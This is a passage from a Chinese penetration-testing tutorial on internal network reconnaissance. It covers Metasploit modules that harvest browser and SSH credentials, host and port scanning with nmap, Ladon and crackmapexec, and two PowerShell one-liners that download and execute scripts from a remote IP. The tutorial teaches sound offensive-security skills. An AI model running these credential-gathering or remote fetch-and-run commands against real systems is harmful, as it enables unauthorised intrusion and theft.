post\/multi\/gather\/env\n\n#\u67e5\u770bfirefox\u4e2d\u5b58\u50a8\u7684\u8d26\u53f7\u5bc6\u7801 \uff1a\nrun post\/multi\/gather\/firefox_creds\n\n#\u67e5\u770bssh\u8d26\u53f7\u5bc6\u7801\u7684\u5bc6\u6587\u4fe1\u606f \uff0c\u8bc1\u4e66\u4fe1\u606f\uff1a\nrun post\/multi\/gather\/ssh_creds\n\n# \u67e5\u770b\u76ee\u6807\u7cfb\u7edf\u6240\u6709\u7f51\u7edc\u6d41\u91cf\u5e76\u4e14\u8fdb\u884c\u6570\u636e\u5305\u8bb0\u5f55\uff1a\n# -i \u6307\u5b9a\u8bb0\u5f55\u6570\u636e\u5305\u7684\u7f51\u5361\nrun packetrecorder -i 0 \n\n#\u8bfb\u53d6\u76ee\u6807\u4e3b\u673aIE\u6d4f\u89c8\u5668cookies\u7b49\u7f13\u5b58\u4fe1\u606f \uff0c\u55c5\u63a2\u76ee\u6807\u4e3b\u673a\u767b\u5f55\u8fc7\u7684\u5404\u7c7b\u8d26\u53f7\u5bc6\u7801\uff1a\nrun post\/windows\/gather\/enum_ie\n\n#\u83b7\u53d6\u5230\u7684\u76ee\u6807\u4e3b\u673a\u4e0a\u7684ie\u6d4f\u89c8\u5668\u7f13\u5b58\u5386\u53f2\u8bb0\u5f55\u548ccookies\u4fe1\u606f\u7b49\u90fd\u4fdd\u5b58\u5230\u4e86\u653b\u51fb\u4e3b\u673a\u672c\u5730\u7684\/root\/.msf4\/loot\/\u76ee\u5f55\u4e0b\n<\/code><\/pre>\n6.Winenum<\/h2>\n
winenum \u6a21\u5757\u662f\u4e00\u4e2a\u591a\u529f\u80fd\u7684\u679a\u4e3e\u5de5\u5177\uff0c\u5b83\u53ef\u4ee5\u5e2e\u52a9\u6e17\u900f\u6d4b\u8bd5\u4eba\u5458\u5feb\u901f\u6536\u96c6\u76ee\u6807\u7cfb\u7edf\u7684\u5173\u952e\u4fe1\u606f\uff0c\u4e3a\u8fdb\u4e00\u6b65\u7684\u5206\u6790\u548c\u653b \u51fb\u63d0\u4f9b\u57fa\u7840\u6570\u636e\u3002\u4f7f\u7528\u8fd9\u4e2a\u6a21\u5757\u53ef\u4ee5\u5927\u5927\u51cf\u5c11\u624b\u52a8\u4fe1\u606f\u6536\u96c6\u7684\u65f6\u95f4\u548c\u590d\u6742\u6027\u3002<\/p>\n
run winenum\n\n\/root\/.msf4\/logs\/scripts\/winenum\n<\/code><\/pre>\n7.\u4e3b\u673a\u53d1\u73b0<\/h2>\n
[[01.Metasploit\u6e17\u900f\u6846\u67b6#2.MSF \u4e3b\u673a\u53d1\u73b0]]
\n\u6a21\u5757\u8def\u5f84\uff1amodules\/auxiliary\/scanner\/discovery\/<\/p>\n
search aux \/scanner\/discovery\n<\/code><\/pre>\n<\/div>
\narp_sweep\uff1a\u4f7f\u7528 ARP \u8bf7\u6c42\u679a\u4e3e\u672c\u5730\u5c40\u57df\u7f51\u4e2d\u7684\u6240\u6709\u6d3b\u8dc3\u4e3b\u673a
\nudp_sweep\uff1a\u901a\u8fc7\u53d1\u9001 UDP \u6570\u636e\u5305\u63a2\u67e5\u6307\u5b9a\u4e3b\u673a\u662f\u5426\u6d3b\u8dc3\uff0c\u5e76\u53d1\u73b0\u4e3b\u673a\u4e0a\u7684 UDP \u670d\u52a1\u3002<\/p>\n\u6a21\u5757\u4f7f\u7528\u5e94\u8be5\u77e5\u9053\u7684\uff0c\u4f7f\u7528options\u67e5\u770b\u9009\u9879<\/p>\n
8.\u7aef\u53e3\u626b\u63cf<\/h2>\n
[[01.Metasploit\u6e17\u900f\u6846\u67b6#4.MSF \u7aef\u53e3\u626b\u63cf]]
\n\u6a21\u5757\u8def\u5f84\uff1amodules\/auxiliary\/scanner\/portscan\/<\/p>\n
search scanner\/portscan\n<\/code><\/pre>\n<\/div><\/p>\n\n- auxiliary\/scanner\/protscan\/tcp
\n\u901a\u8fc7\u4e00\u6b21\u5b8c\u6574\u7684TCP\u8fde\u63a5\u6765\u5224\u65ad\u7aef\u53e3\u662f\u5426\u5f00\u653e \u6700\u51c6\u786e\u4f46\u662f\u6700\u6162<\/li>\n - auxiliary\/scanner\/protscan\/ack
\n\u901a\u8fc7ACK\u626b\u63cf\u7684\u65b9\u5f0f\u5bf9\u9632\u706b\u5899\u4e0a\u672a\u88ab\u5c4f\u853d\u7684\u7aef\u53e3\u8fdb\u884c\u63a2\u6d4b<\/li>\n - auxiliary\/scanner\/protscan\/syn
\n\u4f7f\u7528\u53d1\u9001TCP SYN\u6807\u5fd7\u7684\u65b9\u5f0f\u63a2\u6d4b\u5f00\u653e\u7aef\u53e3<\/li>\n - auxiliary\/scanner\/protscan\/ftpbounce
\n\u901a\u8fc7FTP bounce\u653b\u51fb\u7684\u539f\u7406\u5bf9TCP\u670d\u52a1\u8fdb\u884c\u679a\u4e3e\uff0c\u4e00\u4e9b\u65b0\u7684FTP\u670d\u52a1\u5668\u8f6f\u4ef6\u80fd\u5f88\u597d\u7684\u9632\u8303\u6b64\u653b\u51fb\uff0c\u4f46\u5728\u65e7\u7684\u7cfb\u7edf\u4e0a\u4ecd\u53ef\u4ee5\u88ab\u5229\u7528<\/li>\n - auxiliary\/scanner\/protscan\/xmas
\n\u4e00\u79cd\u66f4\u4e3a\u9690\u79d8\u7684\u626b\u63cf\u65b9\u5f0f\uff0c\u901a\u8fc7\u53d1\u9001FIN\uff0cPSH\uff0cURG\u6807\u5fd7\uff0c\u80fd\u591f\u8eb2\u907f\u4e00\u4e9b\u9ad8\u7ea7\u7684TCP\u6807\u8bb0\u68c0\u6d4b\u5668\u7684\u8fc7\u6ee4<\/li>\n<\/ul>\n\u4e00\u822c\u60c5\u51b5\u4e0b\u63a8\u8350\u4f7f\u7528 syn \u7aef\u53e3\u626b\u63cf\u5668\uff0c\u901f\u5ea6\u8f83\u5feb\uff0c\u7ed3\u679c\u51c6\u786e\uff0c\u4e0d\u6613\u88ab\u5bf9\u65b9\u5bdf\u89c9<\/p>\n
9.\u670d\u52a1\u626b\u63cf<\/h2>\n
[[01.Metasploit\u6e17\u900f\u6846\u67b6#3.MSF \u670d\u52a1\u626b\u63cf]]<\/p>\n
\u56db\u3001\u5185\u7f51\u4e3b\u673a\u5b58\u6d3b\u63a2\u6d4b<\/h1>\n1.Netbios \u534f\u8bae\u63a2\u6d4b<\/h2>\n1\uff09NetBIOS\u7b80\u4ecb<\/h3>\n
NetBIOS\uff08Network Basic Input\/Output System\uff09\u662f\u4e00\u79cd\u5e94\u7528\u7a0b\u5e8f\u63a5\u53e3\uff08API\uff09\uff0c\u7531 IBM \u5f00\u53d1\uff0c\u7528\u4e8e\u7b80\u5316\u5c0f\u578b\u5230\u4e2d\u578b\u5c40\u57df \u7f51\u5185\u7684\u7a0b\u5e8f\u95f4\u901a\u4fe1\u3002NetBIOS \u63d0\u4f9b\u4e86\u4e00\u7ec4\u7edf\u4e00\u7684\u547d\u4ee4\u96c6\uff0c\u4f7f\u5f97\u5e94\u7528\u7a0b\u5e8f\u80fd\u591f\u8bf7\u6c42\u7f51\u7edc\u670d\u52a1\u548c\u8d44\u6e90\u8bbf\u95ee\u3002NetBIOS \u540d\u79f0\u53ef\u4ee5\u5229\u7528\u591a\u79cd\u89e3\u6790\u673a\u5236\uff0c\u5305\u62ec Windows Internet Name Service (WINS)\u3001\u5e7f\u64ad\u548c Lmhosts \u6587\u4ef6\uff0c\u5c06\u8ba1\u7b97\u673a\u540d\u79f0\u89e3\u6790\u4e3a IP \u5730 \u5740\uff0c\u5b9e\u73b0\u7f51\u7edc\u901a\u4fe1\u548c\u8d44\u6e90\u5171\u4eab\u3002<\/p>\n
2\uff09\u4f7f\u7528Nmap\u8fdb\u884cNetBIOS\u626b\u63cf<\/h3>\nnmap -sU -T4 --script nbstat.nse -p137 10.10.10.0\/24\n<\/code><\/pre>\n\u6b64\u547d\u4ee4\u4f7f\u7528 UDP \u626b\u63cf\uff08-sU\uff09\uff0c\u6307\u5b9a\u811a\u672c nbstat.nse \u6765\u83b7\u53d6 NetBIOS \u7edf\u8ba1\u4fe1\u606f\uff0c\u5e76\u4e14\u53ea\u626b\u63cf\u7aef\u53e3 137\u3002<\/p>\n
3\uff09MSF\u626b\u63cf<\/h3>\nmsf6 > use auxiliary\/scanner\/netbios\/nbname\n<\/code><\/pre>\n4\uff09Nbtscan<\/h3>\n
Nbtscan \u662f\u4e00\u4e2a\u547d\u4ee4\u884c\u5de5\u5177\uff0c\u7528\u4e8e\u626b\u63cf\u5f00\u653e\u7684 NetBIOS \u540d\u79f0\u670d\u52a1\u5668\u3002\u5b83\u53ef\u4ee5\u5728 Windows \u548c Linux \u7cfb\u7edf\u4e0a\u8fd0 \u884c\uff0c\u5e76\u4e14\u80fd\u591f\u8f93\u51fa IP \u5730\u5740\u3001\u673a\u5668\u540d\u3001\u57df\u540d\u79f0\u4ee5\u53ca\u5f00\u542f\u7684\u670d\u52a1\u5217\u8868\u3002<\/p>\n
\n- Windows<\/li>\n<\/ul>\n
nbtscan.exe -m 10.10.10.0\/24\n\nnbtstat -n\n<\/code><\/pre>\n\n- Linux<\/li>\n<\/ul>\n
nbtscan -r 10.10.10.0\/24\n<\/code><\/pre>\n2.ICMP \u534f\u8bae\u63a2\u6d4b<\/h2>\n1\uff09ICMP\u534f\u8bae\u7b80\u4ecb<\/h3>\n
ICMP\u662fTCP\/IP\u534f\u8bae\u65cf\u4e2d\u7528\u4e8e\u5728IP\u7f51\u7edc\u4f20\u9012\u63a7\u5236\u4fe1\u606f\u548c\u5dee\u9519\u62a5\u544a\u7684\u534f\u8bae\uff0c\u5177\u6709\u5dee\u9519\u62a5\u544a\u3001\u8bca\u65ad\u53ca\u7f51\u7edc\u63a7\u5236\u7b49\u529f\u80fd\uff0c\u901a\u8fc7\u5728IP\u6570\u636e\u5305\u4e2d\u5c01\u88c5\u6d88\u606f\u5934\u90e8\u4e0d\u540c\u5b57\u6bb5\u503c\u6765\u5de5\u4f5c\uff0c\u5e38\u7528\u4e8e\u7f51\u7edc\u6545\u969c\u6392\u67e5\u4e0e\u6027\u80fd\u6d4b\u8bd5\uff0c\u4f46\u4e5f\u5b58\u5728\u88ab\u7528\u4e8eDDoS\u653b\u51fb\u3001ICMP\u96a7\u9053\u7ed5\u8fc7\u5b89\u5168\u8bbe\u5907\u7b49\u5b89\u5168\u95ee\u9898\u3002\uff08\u6bd4\u5982ping\uff09<\/p>\n
2\uff09CMD\u4e0b\u626b\u63cf\u5185\u7f51C\u6bb5\u5b58\u6d3b\u4e3b\u673a<\/h3>\n\n- \u4f7f\u7528\u00a0for\u00a0\u5faa\u73af\u7ed3\u5408\u00a0ping\u00a0\u547d\u4ee4\u5feb\u901f\u68c0\u6d4b\u5185\u7f51\u4e2d\u5b58\u6d3b\u7684\u4e3b\u673a<\/li>\n<\/ul>\n
for \/l %i in (1,1,255) do @ ping 10.0.0.%i -w 1 -n 1|find \/i \"ttl=\"\n<\/code><\/pre>\n\n- \u5c06\u5b58\u6d3b\u4e3b\u673a\u548c\u4e0d\u5b58\u6d3b\u4e3b\u673a\u7684 IP \u5730\u5740\u5206\u522b\u8f93\u51fa\u5230\u4e0d\u540c\u7684\u6587\u4ef6\u4e2d\uff0c\u4ee5\u4fbf\u4e8e\u540e\u7eed\u5206\u6790<\/li>\n<\/ul>\n
@for \/l %i in (1,1,255) do @ping -n 1 -w 40 10.10.10.%i & if errorlevel 1 (echo 10.10.10.%i>>c:\\a.txt) else (echo 10.10.10.%i >>c:\\b.txt)\n<\/code><\/pre>\n3\uff09NMAP\u626b\u63cf<\/h3>\n\n- \u4f7f\u7528 Nmap \u7684 ICMP \u626b\u63cf\u9009\u9879\u6765\u63a2\u6d4b\u6574\u4e2a C \u6bb5\u5185\u5b58\u6d3b\u7684\u4e3b\u673a\u3002<\/li>\n<\/ul>\n
nmap -sn -PE -T4 10.10.10.0\/24\n<\/code><\/pre>\n\n- -sn\u00a0\u8868\u793a\u4e0d\u8fdb\u884c\u7aef\u53e3\u626b\u63cf\uff0c\u4ec5\u8fdb\u884c\u4e3b\u673a\u53d1\u73b0\u3002<\/li>\n
- -PE\u00a0\u4f7f\u7528 ICMP echo \u8bf7\u6c42\u8fdb\u884c ping \u626b\u63cf\u3002<\/li>\n<\/ul>\n
4\uff09Powershell\u626b\u63cf<\/h3>\n\n- \u4f7f\u7528 PowerShell \u811a\u672c\u8fdb\u884c ICMP \u63a2\u6d4b\uff0c\u53ef\u4ee5\u6307\u5b9a\u8d77\u59cb\u548c\u7ed3\u675f\u5730\u5740\uff0c\u4ee5\u53ca\u8981\u626b\u63cf\u7684\u7aef\u53e3\u3002<\/li>\n
- \u672c\u5730\u52a0\u8f7d<\/li>\n<\/ul>\n
powershell.exe \u2010exec bypass \u2010Command \"Import\u2010Module .\/Invoke\u2010TSPingSweep.ps1; Invoke\u2010TSPingSweep \u2010StartAddress 192.168.1.1 \u2010EndAddress 192.168.1.254 \u2010ResolveHost \u2010ScanPort \u2010Port 445,135\"\n<\/code><\/pre>\n\n- \u8fdc\u7a0b\u52a0\u8f7d<\/li>\n<\/ul>\n
powershell iex(new-object net.webclient).downloadstring('http:\/\/47.104.255.11:8000\/Invoke-TSPingSweep.ps1');Invoke-TSPingSweep -StartAddress 10.10.10.1 -EndAddress 10.10.10.254 -ResolveHost -ScanPort -Port 445,135\n<\/code><\/pre>\n3.UDP \u534f\u8bae\u63a2\u6d4b<\/h2>\n1\uff09UDP \u7b80\u4ecb<\/h3>\n
UDP\uff08User Datagram Protocol\uff09\u662f\u4e00\u79cd\u5728 IP \u5c42\u4e4b\u4e0a\u63d0\u4f9b\u7b80\u5355\u4f20\u8f93\u670d\u52a1\u7684\u4f20\u8f93\u5c42\u534f\u8bae\u3002UDP \u4e0d\u50cf TCP \u90a3\u6837\u63d0\u4f9b\u6570\u636e\u5305\u6392 \u5e8f\u3001\u786e\u8ba4\u6216\u91cd\u4f20\u673a\u5236\u3002\u4e5f\u5c31\u662f\u8bf4\uff0c\u5f53\u62a5\u6587\u53d1\u9001\u4e4b\u540e\uff0c\u662f\u65e0\u6cd5\u5f97\u77e5\u5176\u662f\u5426\u5b89\u5168\u5b8c\u6574\u5230\u8fbe\u7684\uff0c\u9002\u7528\u4e8e\u5bf9\u5b9e\u65f6\u6027\u8981\u6c42\u9ad8\u6216\u5bf9\u6570\u636e\u51c6\u786e\u6027\u8981\u6c42\u4e0d\u9ad8\u7684\u573a\u666f\u3002<\/p>\n
2\uff09\u4f7f\u7528 Nmap \u8fdb\u884c UDP \u626b\u63cf<\/h3>\nnmap -sU \u2013T4 -sV --max-retries 1 192.168.1.100 -p500\n<\/code><\/pre>\n\n- -sU\u00a0\u6307\u5b9a UDP \u626b\u63cf\u3002<\/li>\n
- -T4\u00a0\u8c03\u6574\u626b\u63cf\u901f\u5ea6\u3002<\/li>\n
- –max-retries 1\u00a0\u9650\u5236\u91cd\u8bd5\u6b21\u6570\u4ee5\u51cf\u5c11\u7f51\u7edc\u5e72\u6270\u3002<\/li>\n
- -p500\u00a0\u6307\u5b9a\u626b\u63cf UDP \u7aef\u53e3 500\u3002<\/li>\n<\/ul>\n
3\uff09\u4f7f\u7528 Metasploit \u8fdb\u884c UDP \u63a2\u6d4b<\/h3>\n\n- \u8fd9\u4e9b\u6a21\u5757\u53ef\u4ee5\u53d1\u9001 UDP \u6570\u636e\u5305\u6765\u63a2\u6d4b\u76ee\u6807\u7f51\u7edc\u4e2d\u7684\u6d3b\u8dc3\u4e3b\u673a\u3002<\/li>\n<\/ul>\n
msf > use auxiliary\/scanner\/discovery\/udp_probe\nmsf > use auxiliary\/scanner\/discovery\/udp_sweep\n<\/code><\/pre>\n4\uff09Unicornscan \u626b\u63cf<\/h3>\n
Unicornscan\u662f\u4e00\u4e2a\u5f3a\u5927\u7684\u5f00\u6e90\u7f51\u7edc\u626b\u63cf\u5de5\u5177\uff0c\u5b83\u652f\u6301\u591a\u79cd\u9ad8\u7ea7\u626b\u63cf\u6280\u672f\uff0c\u5305\u62ec\u4f46\u4e0d\u9650\u4e8eTCP\u3001UDP\u3001ICMP\u548c\u5176\u4ed6\u81ea\u5b9a\u4e49 \u534f\u8bae\u7684\u626b\u63cf\u3002\u5728 Linux \u4e0b\u63a8\u8350\u4f7f\u7528\u3002<\/p>\n
unicornscan -mU 192.168.1.100\n<\/code><\/pre>\n4.ARP \u534f\u8bae\u63a2\u6d4b<\/h2>\n1\uff09ARP \u7b80\u4ecb<\/h3>\n
ARP\u901a\u8fc7\u89e3\u6790\u7f51\u8def\u5c42\u5730\u5740\u6765\u627e\u5bfb\u6570\u636e\u94fe\u8def\u5c42\u5730\u5740\u7684\u4e00\u4e2a\u5728\u7f51\u7edc\u534f\u8bae\u5305\u4e2d\u6781\u5176\u91cd\u8981\u7684\u7f51\u7edc\u4f20\u8f93\u534f\u8bae\u3002\u6839\u636e IP \u5730\u5740\u83b7\u53d6\u7269\u7406\u5730\u5740\u7684\u4e00\u4e2a TCP\/IP \u534f\u8bae\u3002\u4e3b\u673a\u53d1\u9001\u4fe1\u606f\u65f6\u5c06\u5305\u542b\u76ee\u6807 IP \u5730\u5740\u7684 ARP \u8bf7\u6c42\u5e7f\u64ad\u5230\u7f51\u7edc\u4e0a\u7684\u6240\u6709\u4e3b\u673a\uff0c\u5e76\u63a5\u6536\u8fd4\u56de\u6d88\u606f\uff0c\u4ee5\u6b64\u786e\u5b9a\u76ee\u6807\u7684\u7269\u7406\u5730\u5740\uff08MAC\u5730\u5740\uff09\u3002<\/p>\n
2\uff09NMAP \u626b\u63cf<\/h3>\nnmap -sn -PR 192.168.1.1\/24\n<\/code><\/pre>\n3\uff09MSF \u626b\u63cf<\/h3>\nmsf > use auxiliary\/scanner\/discovery\/arp_sweep\n<\/code><\/pre>\n4\uff09Netdiscover<\/h3>\n
Netdiscover\u662f\u4e00\u79cd\u7f51\u7edc\u626b\u63cf\u5de5\u5177\uff0c\u901a\u8fc7 ARP \u626b\u63cf\u53d1\u73b0\u6d3b\u52a8\u4e3b\u673a\uff0c\u53ef\u4ee5\u901a\u8fc7\u4e3b\u52a8\u548c\u88ab\u52a8\u4e24\u79cd\u6a21\u5f0f\u8fdb\u884c ARP \u626b\u63cf\u3002\u901a\u8fc7 \u4e3b\u52a8\u53d1\u9001 ARP \u8bf7\u6c42\u68c0\u67e5\u7f51\u7edc ARP \u6d41\u91cf\uff0c\u901a\u8fc7\u81ea\u52a8\u626b\u63cf\u6a21\u5f0f\u626b\u63cf\u7f51\u7edc\u5730\u5740\u3002
\n\u5728kali\u4e2d\u6267\u884c<\/p>\n
netdiscover -r 10.10.10.0\/24 -i eth1\n<\/code><\/pre>\n5\uff09Powershell<\/h3>\n
\u4f7f\u7528 PowerShell \u8fdb\u884c ARP \u626b\u63cf Invoke-ARPScan.ps1<\/p>\n
powershell.exe -exec bypass -Command \"Import-Module .\\arpscan.ps1;InvokeARPScan -CIDR 192.168.1.0\/24\"\n<\/code><\/pre>\n<\/div><\/p>\n6\uff09arp-scan\uff08linux\uff09<\/h3>\n
arp-scan \u662f\u4e00\u4e2a\u7528\u4e8e ARP \u626b\u63cf\u7684\u547d\u4ee4\u884c\u5de5\u5177\uff0c\u5b83\u53ef\u4ee5\u5feb\u901f\u626b\u63cf\u5c40\u57df\u7f51\u5185\u7684\u6d3b\u52a8\u4e3b\u673a\uff1a<\/p>\n
arp-scan -interface=eth1 --localnet\n<\/code><\/pre>\n7\uff09arp-scan\uff08windows\uff09<\/h3>\narp-scan.exe \u2013t 10.10.10.0\/24\n<\/code><\/pre>\n5.SMB \u534f\u8bae\u63a2\u6d4b<\/h2>\n1\uff09SMB \u534f\u8bae\u7b80\u4ecb<\/h3>\n
SMB\uff08Server Message Block\uff09\u534f\u8bae\u662f\u4e00\u79cd\u7f51\u7edc\u6587\u4ef6\u5171\u4eab\u534f\u8bae\uff0c\u5e7f\u6cdb\u7528\u4e8eWindows\u7f51\u7edc\u73af\u5883\u4e2d\u3002\u5b83\u5141\u8bb8\u5e94\u7528\u7a0b\u5e8f\u5728\u7f51\u7edc\u4e2d\u7684\u8ba1\u7b97\u673a\u4e0a\u8bbf\u95ee\u6587\u4ef6\u3001\u6253\u5370\u670d\u52a1\u548c\u4e32\u884c\u7aef\u53e3\u3002SMB \u534f\u8bae\u4e5f\u7ecf\u5386\u4e86\u591a\u4e2a\u7248\u672c\u7684\u66f4\u65b0\uff0c\u5305\u62ecSMBv1\u3001SMBv2\u548cSMBv3\u3002<\/p>\n
2\uff09NMAP<\/h3>\n
Nmap \u53ef\u4ee5\u5229\u7528\u811a\u672c\u5bf9SMB\u670d\u52a1\u8fdb\u884c\u8be6\u7ec6\u7684\u63a2\u6d4b\uff0c\u4f8b\u5982\u679a\u4e3e\u5171\u4eab<\/p>\n
nmap \u2010sU \u2010sS \u2010\u2010script smb\u2010enum\u2010shares.nse \u2010p 445 192.168.1.119\n<\/code><\/pre>\n3\uff09Crackmapexec(\u597d\u7528)<\/h3>\n
CrackMapExec \u662f\u4e00\u4e2a\u7528\u4e8e\u6267\u884c\u7f51\u7edc\u8eab\u4efd\u9a8c\u8bc1\u7684Python\u5de5\u5177\uff0c\u53ef\u4ee5\u5bf9SMB\u670d\u52a1\u8fdb\u884c\u63a2\u6d4b<\/p>\n
# \u9ed8\u8ba4\u4e3a 100 \u7ebf\u7a0b\ncrackmapexec smb 10.10.10.0\/24\n<\/code><\/pre>\n4\uff09MSF<\/h3>\n
\u6b64\u6a21\u5757\u53ef\u4ee5\u68c0\u6d4b\u76ee\u6807\u4e3b\u673a\u4e0a\u8fd0\u884c\u7684SMB\u534f\u8bae\u7248\u672c\u3002<\/p>\n
Msf5 > use auxiliary\/scanner\/smb\/smb_version\n<\/code><\/pre>\n6.\u57df\u5185\u7aef\u53e3\u63a2\u6d4b<\/h2>\n1\uff09MSF \u4e2d\u7684 portscan \u6a21\u5757<\/h3>\n2\uff09Nishang \u4e2d\u7684 Invoke-PortScan \u6a21\u5757<\/h3>\n\n- \u7aef\u53e3\u626b\u63cf\uff0c\u9ed8\u8ba4\u626b\u63cf\u5e38\u89c1\u7aef\u53e3\uff0c\u4e5f\u53ef\u4ee5\u7528 -Port \u6307\u5b9a\u7aef\u53e3\uff1a<\/li>\n<\/ul>\n
powershell iex(new-object net.webclient).downloadstring('http:\/\/47.104.255.11:8000\/Invoke-PortScan.ps1');Invoke-PortScan -StartAddress 10.10.10.1 -EndAddress 10.10.10.255 -ResolveHost -ScanPort\n<\/code><\/pre>\n\u4e94\u3001\u5185\u7f51\u4fe1\u606f\u6536\u96c6\u5de5\u5177<\/h1>\n1.Fscan<\/h2>\n\n- \u7b80\u4ecb\uff1a
\n\u4e00\u6b3e\u5185\u7f51\u7efc\u5408\u626b\u63cf\u5de5\u5177\uff0c\u65b9\u4fbf\u4e00\u952e\u81ea\u52a8\u5316\u3001\u5168\u65b9\u4f4d\u6f0f\u626b\u626b\u63cf\u3002 \u652f\u6301\u4e3b\u673a\u5b58\u6d3b\u63a2\u6d4b\u3001\u7aef\u53e3\u626b\u63cf\u3001\u5e38\u89c1\u670d\u52a1\u7684\u7206\u7834\u3001ms17010\u3001redis \u6279\u91cf\u5199\u516c\u94a5\u3001\u8ba1\u5212\u4efb\u52a1\u53cd\u5f39 shell\u3001\u8bfb\u53d6 win \u7f51\u5361 \u4fe1\u606f\u3001web \u6307\u7eb9\u8bc6\u522b\u3001web \u6f0f\u6d1e\u626b\u63cf\u3001netbios \u63a2\u6d4b\u3001\u57df\u63a7\u8bc6\u522b\u7b49\u529f\u80fd\u3002<\/li>\n - \u4f7f\u7528\uff1a<\/li>\n<\/ul>\n
# \u9ed8\u8ba4\u4f7f\u7528\u5168\u90e8\u6a21\u5757\nfscan.exe -h 192.168.1.1\/24\n\n# B \u6bb5\u626b\u63cf\nfscan.exe -h 192.168.1.1\/16\n<\/code><\/pre>\n2.LadonGo<\/h2>\n\n- \u7b80\u4ecb\uff1a
\nLadonGO 4.2 Pentest Scanner framework \u5168\u5e73\u53f0 Go \u5f00\u6e90\u5185\u7f51\u6e17\u900f\u626b\u63cf\u5668\u6846\u67b6,Windows\/Linux\/Mac \u5185\u7f51\u6e17\u900f\uff0c\u4f7f\u7528\u5b83 \u53ef\u8f7b\u677e\u4e00\u952e\u6279\u91cf\u63a2\u6d4b C \u6bb5\u3001B \u6bb5\u3001A \u6bb5\u5b58\u6d3b\u4e3b\u673a\u3001\u9ad8\u5371\u6f0f\u6d1e\u68c0\u6d4b MS17010\u3001SmbGhost\uff0c\u8fdc\u7a0b\u6267\u884c SSH\/Winrm\uff0c\u5bc6\u7801\u7206 \u7834 SMB\/SSH\/FTP\/Mysql\/Mssql\/Oracle\/Winrm\/HttpBasic\/Redis\uff0c\u7aef\u53e3\u626b\u63cf\u670d\u52a1\u8bc6\u522b PortScan \u6307\u7eb9\u8bc6 \u522b\/HttpBanner\/HttpTitle\/TcpBanner\/Weblogic\/Oxid \u591a\u7f51\u5361\u4e3b\u673a\uff0c\u7aef\u53e3\u626b\u63cf\u670d\u52a1\u8bc6\u522b PortScan\u3002<\/li>\n - \u4f7f\u7528\uff1a<\/li>\n<\/ul>\n
#\u591a\u534f\u8bae\u63a2\u6d4b\u5b58\u6d3b\u4e3b\u673a \uff08IP\u3001\u673a\u5668\u540d\u3001MAC \u5730\u5740\u3001\u5236\u9020\u5546\uff09\nLadon 192.168.1.8\/24 OnlinePC\n\n#\u591a\u534f\u8bae\u8bc6\u522b\u64cd\u4f5c\u7cfb\u7edf \uff08IP\u3001\u673a\u5668\u540d\u3001\u64cd\u4f5c\u7cfb\u7edf\u7248\u672c\u3001\u5f00\u653e\u670d\u52a1\uff09\nLadon 192.168.1.8\/24 OsScan\n\n#\u626b\u63cf\u5b58\u6d3b\u4e3b\u673a-\nLadon 192.168.1.8\/24 OnlineIP\n\n#ICMP\u626b\u63cf\u5b58\u6d3b\u4e3b\u673a\nLadon 192.168.1.8\/24 Ping\n\n#\u626b\u63cfSMB\u6f0f\u6d1eMS17010 \uff08IP\u3001\u673a\u5668\u540d\u3001\u6f0f\u6d1e\u7f16\u53f7\u3001\u64cd\u4f5c\u7cfb\u7edf\u7248\u672c\uff09\nLadon 192.168.1.8\/24 MS17010\n\n#SMBGhost\u6f0f\u6d1e\u68c0\u6d4b CVE-2020-0796 \uff08IP\u3001\u673a\u5668\u540d\u3001\u6f0f\u6d1e\u7f16\u53f7\u3001\u64cd\u4f5c\u7cfb\u7edf\u7248\u672c\uff09\nLadon 192.168.1.8\/24 SMBGhost\n<\/code><\/pre>\n3.Adfind<\/h2>\n\n- \u7b80\u4ecb\uff1a
\nAdfind \u662f\u4e00\u6b3e\u5728\u57df\u73af\u5883\u4e0b\u975e\u5e38\u5f3a\u5927\u7684\u4fe1\u606f\u641c\u96c6\u5de5\u5177\uff0c\u5141\u8bb8\u7528\u6237\u5728\u57df\u73af\u5883\u4e0b\u8f7b\u677e\u641c\u96c6\u5404\u79cd\u4fe1\u606f\u3002 \u5b83\u63d0\u4f9b\u4e86\u5927\u91cf\u7684\u9009\u9879\uff0c\u53ef\u4ee5\u4f18\u5316\u641c\u7d22\u5e76\u8fd4\u56de\u76f8\u5173\u8be6\u7ec6\u4fe1\u606f\uff0c\u662f\u5185\u7f51\u57df\u6e17\u900f\u4e2d\u7684\u4e00\u6b3e\u5229\u5668\u3002<\/li>\n - \u4f7f\u7528\uff1a<\/li>\n<\/ul>\n
Usage:\n AdFind [switches] [-b basedn] [-f filter] [attr list]\n\n basedn RFC 2253 DN to base search from. If no base specified, defaults to default NC.\n Base DN can also be specified as a SID, GUID, or IID.\n filter RFC 2254 LDAP filter. If no filter specified, defaults to objectclass=*.\n attr list List of specific attributes to return, \n if nothing specified returns 'default' attributes, aka * set.\n\n Switches: (designated by - or \/)\n\n [CONNECTION OPTIONS][\u8fde\u63a5\u9009\u9879]\n -h host:port \u8981\u4f7f\u7528\u7684\u4e3b\u673a\u548c\u7aef\u53e3\u3002\u5982\u679c\u672a\u6307\u5b9a\uff0c\u5219\u4f7f\u7528\u9ed8\u8ba4 LDAP \u670d\u52a1\u5668\u4e0a\u7684\u7aef\u53e3 389\u3002\n Localhost \u53ef\u4ee5\u6307\u5b9a\u4e3a\u201c.\u201d; \u8fd8\u53ef\u4ee5\u901a\u8fc7-p \u548c-gc \u6307\u5b9a\u7aef\u53e3\u3002\n \u6307\u5b9a\u4e86\u5e26\u7aef\u53e3\u7684 IPv6 [address]:port\n -gc \u641c\u7d22\u5168\u5c40\u76ee\u5f55 (port 3268)\u3002\n -p port \u6307\u5b9a\u8981\u8fde\u63a5\u5230\u7684\u7aef\u53e3\u7684\u5907\u7528\u65b9\u6cd5\u3002\n\n [QUERY OPTIONS][\u67e5\u8be2\u9009\u9879]\n -s scope \u641c\u7d22\u8303\u56f4\u3002 Base, One[Level], Sub[tree].\n -t xxx \u67e5\u8be2\u7684\u8d85\u65f6\u503c\uff0c\u9ed8\u8ba4\u4e3a 120 \u79d2\u3002\n\n [OUTPUT OPTIONS][\u8f93\u51fa\u9009\u9879]\n -c \u4ec5\u5bf9\u8c61\u8ba1\u6570\u3002\n -dn \u4ec5\u5bf9\u8c61 DN\u3002\n -appver \u8f93\u51fa AdFind \u7248\u672c\u4fe1\u606f\u3002\n<\/code><\/pre>\n4.BloodHound<\/h2>\n1\uff09\u5b89\u88c5<\/h3>\napt install neo4j -y\n<\/code><\/pre>\n2\uff09\u6536\u96c6\u5668<\/h3>\n3\uff09\u542f\u52a8<\/h3>\n\uff081\uff09\u542f\u52a8 neo4j<\/h4>\nneo4j start\nneo4j console\n<\/code><\/pre>\n\uff082\uff09\u767b\u5f55 